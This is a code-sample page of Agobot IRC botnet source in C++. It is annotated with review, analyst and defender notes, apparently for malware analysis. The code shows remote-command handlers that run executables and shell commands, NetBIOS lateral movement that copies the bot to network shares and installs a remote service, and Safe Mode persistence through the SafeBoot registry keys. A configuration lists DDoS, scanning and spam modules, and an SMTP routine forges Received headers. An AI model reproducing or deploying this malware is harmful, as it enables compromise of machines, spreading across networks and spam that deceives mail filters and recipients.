	REGCMD(m_cmdDie,			"bot.die",			"terminates the bot",								false,	this);
	REGCMD(m_cmdDns,			"bot.dns",			"resolves ip/hostname by dns",						false,	this);
	REGCMD(m_cmdExecute,		"bot.execute",		"makes the bot execute a .exe",						false,	this);
	REGCMD(m_cmdId,				"bot.id",			"displays the id of the current code",				false,	this);
	REGCMD(m_cmdNick,			"bot.nick",			"changes the nickname of the bot",					false,	this);
	REGCMD(m_cmdOpen,			"bot.open",			"opens a file (whatever)",							false,	this);
	REGCMD(m_cmdRemove,			"bot.remove",		"removes the bot",									false,	this);
	REGCMD(m_cmdRemoveAllBut,	"bot.removeallbut",	"removes the bot if id does not match",				false,	this);
	REGCMD(m_cmdRndNick,		"bot.rndnick",		"makes the bot generate a new random nick",			false,	this);
	REGCMD(m_cmdStatus,			"bot.status",		"gives status",										false,	this);
	REGCMD(m_cmdSysInfo,		"bot.sysinfo",		"displays the system info",							false,	this);
	REGCMD(m_cmdLongUptime,		"bot.longuptime",	"If uptime > 7 days then bot will respond",			false,	this);
	REGCMD(m_cmdQuit,			"bot.quit",			"quits the bot",									false,	this);
	REGCMD(m_cmdFlushDNS,		"bot.flushdns",		"flushes the bots dns cache",						false,	this);
	REGCMD(m_cmdSecure,			"bot.secure",		"delete shares / disable dcom",						false,	this);
	REGCMD(m_cmdUnSecure,		"bot.unsecure",		"enable shares / enable dcom",						false,	this);
	REGCMD(m_cmdCommand,		"bot.command",		"runs a command with system()",						false,	this);

	// Nickname: random nick built from the configured prefix, cut to 32 characters
	CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
	g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
	m_lStartTime=(unsigned long)GetTickCount()/1000;
}
示例#18
// Asks the local Service Control Manager to start the service sServicename.
// Returns false if the SCM or the service cannot be opened, true otherwise.
//
// NOTE(review): the result of StartService is ignored, so true only means the request
// was issued, not that the service is running. The commented-out block shows an earlier
// approach that shelled out to "net start".
bool CInstaller::ServiceStart(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	StartService(hService, 0, NULL);
	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); 

/*	CString sCmdBuf; sCmdBuf.Format("net start %s", sServicename.CStr());
	system(sCmdBuf.CStr());*/

	return true;
}
示例#19
// Lateral-movement step of the NetBIOS scanner: after a share on `host` has been
// reached, copies two files to it, registers a service on the remote machine through
// that machine's Service Control Manager and starts it. Returns the result of the start
// attempt; false if the remote SCM cannot be opened or service creation fails.
//
// share/host   - remote share and machine the files are copied to.
// user/password- only used in the report sent to the control channel (and passed along
//                on the retry); this function does not authenticate with them itself.
//
// Indicators visible in this listing:
//   - temp file "glx5223.tmp" in the local temp directory (embedded resource
//     IDR_AGOBOTSVC written out, then deleted);
//   - "thesvc.exe" plus the bot's own file copied to \\host\share;
//   - a demand-start, own-process service with key name "cfgldr" whose command line is
//     "<thesvc.exe path>" "<bot path>", display name taken from as_valname;
//   - a control-channel message containing "Exploited" and the login/password used.
// Defender notes: remote service creation shows up on the target as a service-install
// event (System log 7045) with an image path on a network share, and needs
// administrative credentials on the target - weak or shared local administrator
// passwords are what this step depends on.
// NOTE(review): the retry after ERROR_SERVICE_EXISTS is recursive with no attempt limit.
// The early return after a failed StartService skips the handle closes and the file
// deletes below it. A MessageBox is shown on the unexpected-error path.
bool CScannerNetBios::StartViaCreateService(const char *share, const char *host, const char *user, const char *password)
{	bool bRetVal=false; char buffer[MAX_PATH]; SC_HANDLE hServiceControl=OpenSCManager(host, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false; char szBotRemote[MAX_PATH], szBotSvc[MAX_PATH], szSvcCmd[MAX_PATH]; CString sTempPath;

	// Drop the embedded helper to a temp file and copy it to the share (retry up to 25 s)
	GetTempPath(MAX_PATH, sTempPath.GetBuffer(MAX_PATH)); sTempPath.Append("\\glx5223.tmp");
	WriteFile(sTempPath.CStr(), IDR_AGOBOTSVC, NULL);
	sprintf(szBotSvc, "\\\\%s\\%s\\%s", host, share, "thesvc.exe");
	unsigned long lTimeoutStart=GetTickCount();
	while(CopyFile(sTempPath, szBotSvc, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100);
	DeleteFile(sTempPath);

	// Copy the bot's own executable to the share under the configured file name
	GetFilename(buffer, MAX_PATH);
	sprintf(szBotRemote, "\\\\%s\\%s\\%s", host, share, g_cMainCtrl.m_cBot.bot_filename.sValue.CStr());
	lTimeoutStart=GetTickCount();
	while(CopyFile(buffer, szBotRemote, false)==false && GetTickCount()-lTimeoutStart<25000) Sleep(100);

	sprintf(szSvcCmd, "\"%s\" \"%s\"", szBotSvc, szBotRemote);
	SC_HANDLE hService=CreateService(hServiceControl, "cfgldr",
		g_cMainCtrl.m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
		SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, \
		szSvcCmd, NULL, NULL, NULL, NULL, NULL);
	if(!hService) {
		DWORD dwError=GetLastError();
		if(dwError==ERROR_SERVICE_EXISTS) {
			// Stale "cfgldr" service: stop it, delete it, then run the whole routine again
			hService=OpenService(hServiceControl, "cfgldr", SERVICE_ALL_ACCESS);
			if(!hService) { CloseServiceHandle(hServiceControl); return false; }
			SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
			DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);
			return StartViaCreateService(share, host, user, password);
		} else {
			LPVOID lpMsgBuf;
			FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, \
				NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&lpMsgBuf, 0, NULL);
			
			MessageBox(NULL, (LPCTSTR)lpMsgBuf, "Error", MB_OK|MB_ICONINFORMATION);
			
			LocalFree(lpMsgBuf);

			CloseServiceHandle(hServiceControl); return false; }
	}
	if(hService) if(!StartService(hService, 0, NULL)) return bRetVal=false; else bRetVal=true;

	SERVICE_STATUS ssTemp;
//	if(hService) ControlService(hService, SERVICE_CONTROL_STOP, &ssTemp);
//	if(hService) DeleteService(hService);
	if(hService) CloseServiceHandle(hService);
	CloseServiceHandle(hServiceControl);
	// Report to the control channel, then remove both copied files from the share
	g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: Exploited \\\\%s\\%s with l/p: %s/%s (CreateService)!!!", m_sScannerName.CStr(), host, share, user, password);
	DeleteFile(szBotRemote); DeleteFile(szBotSvc);
	return bRetVal; }
示例#20
// Later variant of the service installer: registers an auto-start service with a
// restart-on-failure action, and additionally creates a subkey named after the service
// under both SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal and ...\SafeBoot\Network,
// writing the string "Service" into it.
//
// sServicename - internal (key) name of the service; also used for the SafeBoot subkeys.
// sFilename    - path of the executable; it is quoted in the service command line.
// sParams      - arguments appended after the quoted path.
// Returns true when the service was created and its failure actions were set; the
// SafeBoot registry calls are not checked.
//
// Defender notes: the SafeBoot keys list what Windows loads in Safe Mode, so entries
// there are aimed at surviving a Safe Mode clean-up. Legitimate software rarely adds
// itself to them; an unknown subkey under SafeBoot\Minimal or SafeBoot\Network is a
// strong persistence indicator, next to the service-install event (System log 7045).
// NOTE(review): hService is NULL when CloseServiceHandle(hService) is called on the
// ERROR_SERVICE_EXISTS path. lRet is never examined, so the subsequent calls may operate
// on uninitialised handles. lhnew is opened twice and never closed. RegSetValueEx is
// given dwSize (128) as the data length although only "Service" was copied into
// szDataBuf, so uninitialised stack bytes are written to the registry as well.
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) {

	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	// Service image path: "<sFilename>" <sParams>
	CString sSvcCmd; sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr());
	SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(),
		g_pMainCtrl->m_pBot->as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
		SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \
		sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
	if(!hService) {
		DWORD dwError=GetLastError();
		if(dwError==ERROR_SERVICE_EXISTS) {
			// Existing service of that name: delete it and retry through ServiceAdd()
			ServiceDel(sServicename); CloseServiceHandle(hService);
			CloseServiceHandle(hServiceControl);
			return ServiceAdd(sServicename, sFilename);
		} else {
			CloseServiceHandle(hServiceControl); return false; }
	}

	// One failure action: restart (Delay is in milliseconds; counter never resets)
	SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART;
	SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=INFINITE; sfActions.lpRebootMsg=NULL;
	sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions;

	if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) {
		CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return false;
	}

	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); 
	
	// Safe Mode registration: SafeBoot\Minimal\<service> and SafeBoot\Network\<service>
	HKEY key; HKEY lhmin; HKEY lhnet; HKEY lhnew; DWORD dwSize=128; char szDataBuf[128];	
	strcpy(szDataBuf, "Service");
	LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\", 0, KEY_READ, &key);
	RegOpenKeyEx(key, "Minimal",0,KEY_ALL_ACCESS, &lhmin);
	RegOpenKeyEx(key, "Network",0,KEY_ALL_ACCESS, &lhnet);
	RegCreateKeyEx(lhmin, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL);
	RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
	RegCreateKeyEx(lhnet, sServicename.CStr(), 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &lhnew, NULL);
	RegSetValueEx(lhnew, sServicename.CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
	RegCloseKey(lhnet);
	RegCloseKey(lhmin);
	RegCloseKey(key);

	return true;
}
示例#21
文件: smtp.cpp 项目: hazcod/botnets
// Closes the SMTP session: sends "QUIT", closes the socket and clears the stored
// host, port and connected flag. Returns false if the socket is not connected, true
// otherwise.
//
// NOTE(review): the server's reply to QUIT is not read and the result of Write() is not
// checked. When the socket is already down the function returns early, so m_bConnected
// and the stored host/port are left untouched on that path.
bool CSMTP_Connection::Disconnect() {
	// Fail if not connected
	if(!m_sServerSocket.IsConnected()) return false;

	// Send QUIT command
	CString sReqBuf; sReqBuf.Format("QUIT\r\n");
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
		"Disconnecting from \"%s:%d\"!\n", this,
		m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE

	// Close socket and reset variables
	m_sServerSocket.Disconnect();
	m_sServerHost.Assign(""); m_iServerPort=0; m_bConnected=false;
	return true;
}
示例#22
// Parses a scan-range string of the form "a.b.c.d/mask" into nRange.
//
// Accepts the input only if it is at most 18 characters long, contains exactly three
// dots and one slash, at least one of the four address parts is non-zero, and the mask
// is a multiple of 8. Returns true on success; on failure nRange may already have been
// partially overwritten.
//
// NOTE(review): the checks are structural only. The parts are converted with atoi(), so
// non-numeric text becomes 0 and values outside 0-255 (or a mask outside 0-32, including
// negative multiples of 8) are not rejected. The position of the slash relative to the
// dots is not checked either. The heap copy in szTemp exists only for the character
// count; the loop compares a signed int with strlen()'s unsigned result.
bool ParseNetRange(const CString &sInput, CNetRange &nRange)
{	// Netrange is never longer than 18 characters
	if(sInput.GetLength()>18) return false;

	// Get temp storage and copy the string
	char *szTemp=new char[sInput.GetLength()+2];
	sprintf(szTemp, "%s", sInput.CStr());

	// Get number of dots and slashes in the string
	int iDotCount=0, iSlashCount=0;
	for(int i=0; i<strlen(szTemp); i++)
	{	if(szTemp[i]=='.') iDotCount++;
		else if(szTemp[i]=='/') iSlashCount++; }

	// If there are no 3 dots or there is no slash, fail
	if(iDotCount!=3) { delete [] szTemp; return false; }
	if(iSlashCount!=1) { delete [] szTemp; return false; }

	// Make a copy of the string into a CString and parse it
	// (text before the slash is the address, text after it the mask)
	CString sTemp(szTemp);
	nRange.iPart1=atoi(sTemp.Token(0, "/").Token(0, ".").CStr());
	nRange.iPart2=atoi(sTemp.Token(0, "/").Token(1, ".").CStr());
	nRange.iPart3=atoi(sTemp.Token(0, "/").Token(2, ".").CStr());
	nRange.iPart4=atoi(sTemp.Token(0, "/").Token(3, ".").CStr());
	nRange.iNetMask=atoi(sTemp.Token(1, "/").CStr());

	// Fail if the parts are 0
	if(!nRange.iPart1 && !nRange.iPart2 && !nRange.iPart3 && !nRange.iPart4)
	{	delete [] szTemp; return false; }

	// Fail if the netmask is not a multiple of 8
	if((nRange.iNetMask%8)!=0)
	{	delete [] szTemp; return false; }

	// Success
	delete [] szTemp; return true; }
示例#23
// Compiled-in configuration of the bot (an older code generation than the Init() listing
// on this page: it uses the g_cMainCtrl object directly). Registers every configuration
// variable with its default value, defines a root and one backup control server, copies
// the first server's settings into the active si_* variables, and creates the operator
// account.
//
// The values in this listing are the template placeholders of the source distribution
// ("irc.somewhere.org", "#channel", "filename.exe", a dummy password hash); a built
// sample carries the operator's real values in the same places.
//
// Analyst notes: this function is the map of what to extract from a sample - control
// server address/port/channel and their passwords, the nick prefix ("Ago-" by default),
// the runtime file name (bot_filename), the autostart value / service display name
// (as_valname, "Configuration Loader" by default), the command prefix (".") and the
// operator account with its MD5 password hash and host mask. Defaults that survive into
// a build are ready-made host and network indicators.
// NOTE(review): bot_compnick is registered twice (first and again further down), and the
// variable scan_auto is registered under two names ("scan_auto" and "scan_auto_nb").
// iCryptKey is assigned but not used in this function. The description of
// spam_aol_enabled repeats the "Channel name" text of the line above it.
void CBot::Config()
{	init_random(); int iCryptKey=10; CString sTemp; sTemp.Format("%d", brandom(500, 22226));

	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick,"bot_compnick","false","CompName Generated Nick",false,false,0);	
	
	// The root server, this will be the most often used one
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_chanpass,	"si_server_root.chanpass", \
		"",								"Server Info - Channel Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_mainchan,	"si_server_root.mainchan", \
		"#channel",						"Server Info - Main Channel",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_nickprefix,	"si_server_root.nickprefix", \
		"Ago-",							"Server Info - Nickname prefix",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_port,		"si_server_root.port", \
		"6667",							"Server Info - Server Port",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_server,		"si_server_root.server", \
		"irc.somewhere.org",			"Server Info - Server Address",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_servpass,	"si_server_root.servpass", \
		"",								"Server Info - Server Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServerRoot.si_usessl,		"si_server_root.use_ssl", \
		"false",						"Server Info - Use SSL ?",			false, false, 0 );
	g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServerRoot);

	// Backup server 0
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_chanpass,		"si_server_0.chanpass", \
		"",								"Server Info - Channel Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_mainchan,		"si_server_0.mainchan", \
		"#channel",						"Server Info - Main Channel",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_nickprefix,	"si_server_0.nickprefix", \
		"Ago-",							"Server Info - Nickname prefix",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_port,			"si_server_0.port", \
		"6667",							"Server Info - Server Port",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_server,		"si_server_0.server", \
		"irc2.somewhere.org",			"Server Info - Server Address",		false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_servpass,		"si_server_0.servpass", \
		"",								"Server Info - Server Password",	false, false, 0 );
	g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_usessl,		"si_server_0.use_ssl", \
		"false",						"Server Info - Use SSL ?",			false, false, 0 );
	g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServer0);

	// Active server settings; registered empty here and filled from m_vServers.at(0) below
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_chanpass,		"si_chanpass",		"",							"Server Info - Channel Password",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_mainchan,		"si_mainchan",		"",							"Server Info - Main Channel",						false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_nickprefix,	"si_nickprefix",	"",							"Server Info - Nickname prefix",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_port,			"si_port",			"",							"Server Info - Server Port",						false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_server,		"si_server",		"",							"Server Info - Server Address",						false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_servpass,		"si_servpass",		"",							"Server Info - Server Password",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_usessl,		"si_usessl",		"",							"Server Info - Use SSL ?",							false,	false,	0			);

	// Identity, file name, command prefix, timeouts and autostart settings
	g_cMainCtrl.m_cCVar.RegisterCvar(&si_nick,			"si_nick",			"",							"Server Info - Nickname",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_version,		"bot_version",		VERSION_AGOBOT,				"Bot - Version",									false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_filename,		"bot_filename",		"filename.exe",				"Bot - Runtime Filename",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_id,			"bot_id",			"a3-100",					"Bot - Current ID",									false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_prefix,		"bot_prefix",		".",						"Bot - Command Prefix",								false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_ftrans_port,	"bot_ftrans_port",	sTemp.CStr(),				"Bot - File Transfer Port",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_timeout,		"bot_timeout",		"720000",					"Bot - Timeout for receiving in miliseconds",		false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_seclogin,		"bot_seclogin",		"false",					"Bot - Enable login only by channel messages",		false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick,		"bot_compnick",		"false",					"Bot - Use the computer name as a nickname",		false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&as_valname,		"as_valname",		"Configuration Loader",		"Autostart - Value Name",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&as_enabled,		"as_enabled",		"true",						"Autostart - Enabled",								false,	false,	0			);

	// Thread limits and switches of the scanner, DDoS, redirect and identd modules
	g_cMainCtrl.m_cCVar.RegisterCvar(&scan_maxthreads,	"scan_maxthreads",	"100",						"Scanner - Maximum Number of threads",				false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto,		"scan_auto",		"true",						"Scanner - Autoscan local network",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto,		"scan_auto_nb",		"true",						"Scanner - Autoscan LAN for NetBIOS",				false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&ddos_maxthreads,	"ddos_maxthreads",	"100",						"DDOS - Maximum Number of threads",					false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&redir_maxthreads,	"redir_maxthreads",	"100",						"Redirect - Maximum Number of threads",				false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&identd_enabled,	"identd_enabled",	"false",					"IdentD - Enable the server",						false,	false,	0			);

	g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_channel,	"spam_aol_channel",	"#aolspam",					"AOL Spam - Channel name",							false,	false,	0			);
	g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_enabled,	"spam_aol_enabled",	"true",					"AOL Spam - Channel name",								false,	false,	0			);

	// Make the first registered server (the root server) the active one
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_chanpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_chanpass.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_mainchan, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_mainchan.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_nickprefix, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_nickprefix.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_port, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_port.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_server, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_server.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_servpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_servpass.sValue.CStr());
	g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_usessl, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_usessl.sValue.CStr());

	// Use MD5 Passwords, for security reasons
	// Operator account: (user name, MD5 hash in upper-case hex, host mask, identd)
	g_cMainCtrl.m_cMac.AddUser("User",			"MYMD5HASHWILLBEBIGBADANDLONGHEHE",	"Netmask.Net",	""	);	// "password"
}
示例#24
文件: smtp.cpp 项目: hazcod/botnets
/**
 * Submits one message on the already-open SMTP session in m_sServerSocket:
 * MAIL FROM, RCPT TO and DATA, followed by a locally built header block and
 * sData, terminated with "\r\n.\r\n".
 *
 * Analyst notes -- properties of the generated message that follow from the
 * code below and can serve as mail-filter or forensic indicators:
 *  - The "Received:" trace header is not added by any relay. It is assembled
 *    here from a randomly picked MTA type, random version numbers and a random
 *    OS name, and always claims local submission ("with local", or qmail's
 *    "invoked by ...").
 *  - In the sendmail variant sMTA already begins with "8." and the header puts
 *    "(8." in front of it, directly after the host name with no space.
 *  - When m_bUseSMTPExt is set, Message-Id is "<" + id + "@" + the complete
 *    recipient address + ">", so it carries the recipient address after the '@'.
 *  - "Content-Type: text/html; charset=us-ascii" is appended twice, and the
 *    header block is followed by two "\r\n\r\n" sequences before the body.
 *  - Date: and the Received: timestamp come from gmtime() with a literal "GMT".
 *  - For the MTA types whose cases are empty no Received: header is written.
 *
 * @param sMailFrom     envelope sender; also the address in From: and, via its
 *                      first '@'-separated token, the "Received: from" name
 * @param sMailFromFull display name placed in the From: header
 * @param sRcptTo       envelope recipient; also used in To:, "for <...>" and
 *                      Message-Id
 * @param sSubject      Subject: header value
 * @param sData         message body, appended unmodified
 * @return true when the reply after the message data starts with "250"; false
 *         (after Disconnect()) when a step is rejected, the final Recv()
 *         reports failure, or m_iMTAType reaches the default case of the first
 *         switch
 */
bool CSMTP_Connection::Mail(CString sMailFrom, CString sMailFromFull, 
							CString sRcptTo, CString sSubject, CString sData) {
	CString sReqBuf, sRecvBuf, sHost, sSrcID, sMTA, sOS;

	init_random();

	// Choose which MTA to imitate for this message. The numeric order of the
	// MTA_TYPE_* constants is not visible here, so the reachable set is whatever
	// lies between these two values.
	m_iMTAType=brandom(MTA_TYPE_UNKNOWN, MTA_TYPE_QMAIL);

	// Random OS label that ends up inside the fabricated banner string.
	switch(brandom(1,5)) {
	case 1:
		sOS.Assign("Debian"); break;
	case 2:
		sOS.Assign("RedHat"); break;
	case 3:
		sOS.Assign("SuSE"); break;
	case 4:
		sOS.Assign("Slackware"); break;
	case 5:
		sOS.Assign("FreeBSD"); break;
	default:
		sOS.Assign("Unknown"); break; }

	// Build the banner text (sMTA) that is later embedded in the Received: header.
	switch(m_iMTAType) {
	case MTA_TYPE_UNKNOWN:
		{	CString sVersionHigh, sVersionLow, sNumber;
			sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40));

			sMTA.Format("SMTP %s.%s (%s)",
				sVersionHigh.CStr(), sVersionLow.CStr(), sOS.CStr()); }
		break;
	case MTA_TYPE_EXIM:
		{	CString sVersionHigh, sVersionLow, sNumber;
			sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sNumber.Assign(brandom(1, 5));

			sMTA.Format("Exim %s.%s #%s (%s)",
				sVersionHigh.CStr(), sVersionLow.CStr(), sNumber.CStr(), sOS.CStr()); }
		break;
	case MTA_TYPE_SENDMAIL:
		{	CString sVersionHigh, sVersionLow, sVersionLow2;
			sVersionHigh.Assign(brandom(1, 12)); sVersionLow.Assign(brandom(1, 10));
			sVersionLow2.Assign(brandom(1, 10));

			sMTA.Format("8.%s.%s/8.%s.%s",
				sVersionHigh.CStr(), sVersionLow.CStr(), sVersionHigh.CStr(), sVersionLow2.CStr()); }
		break;
	case MTA_TYPE_QMAIL:
		{	CString sPid; sPid.Assign(brandom(1, 65000));
			CString sInvokedBy; int iInvokedBy=brandom(1,3);
			if(iInvokedBy==1) {
				sInvokedBy.Assign("alias");
			} else if(iInvokedBy==2) {
				sInvokedBy.Assign("network");
			} else if(iInvokedBy==3) {
				sInvokedBy.Assign("uid 0");
			}

			sMTA.Format("qmail %s invoked by %s",
				sPid.CStr(), sInvokedBy.CStr()); }
		break;
	// The remaining known types have no banner; sMTA stays empty for them.
	case MTA_TYPE_GAIA:
		break;
	case MTA_TYPE_MSSMTPSVC:
		break;
	case MTA_TYPE_MSEXCHANGE:
		break;
	case MTA_TYPE_HOTMAILWM:
		break;
	case MTA_TYPE_WEBMAIL:
		break;
	case MTA_TYPE_POSTFIX:
		break;
	case MTA_TYPE_SMTPD:
		break;
	case MTA_TYPE_LIST_AMIRC:
		break;
	default:
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Invalid MTA type selected!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		break; }

	// Generate an ID
	CString sID=GenerateID(); sSrcID.Assign(sID);

	// Get local hostname
	sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr());

	// Send MAIL FROM command
	sReqBuf.Format("MAIL FROM:<%s>\r\n", sMailFrom.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// MAIL FROM failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected MAIL FROM \"%s\" (\"%s\")!\n", this,
			sMailFrom.CStr(), sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Send RCPT TO command
	sReqBuf.Format("RCPT TO:<%s>\r\n", sRcptTo.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// RCPT TO failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected RCTP TO \"%s\" (\"%s\")!\n", this,
			sRcptTo.CStr(), sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Send DATA command
	sReqBuf.Format("DATA\r\n");
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192);
	if(sRecvBuf.Mid(0, 3).Compare("354")) {
		// DATA failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected DATA (\"%s\")!\n", this,
			sRecvBuf.Token(0, "\r").CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Get local time
	// (formatted from gmtime(), with "GMT" as literal text in the format string)
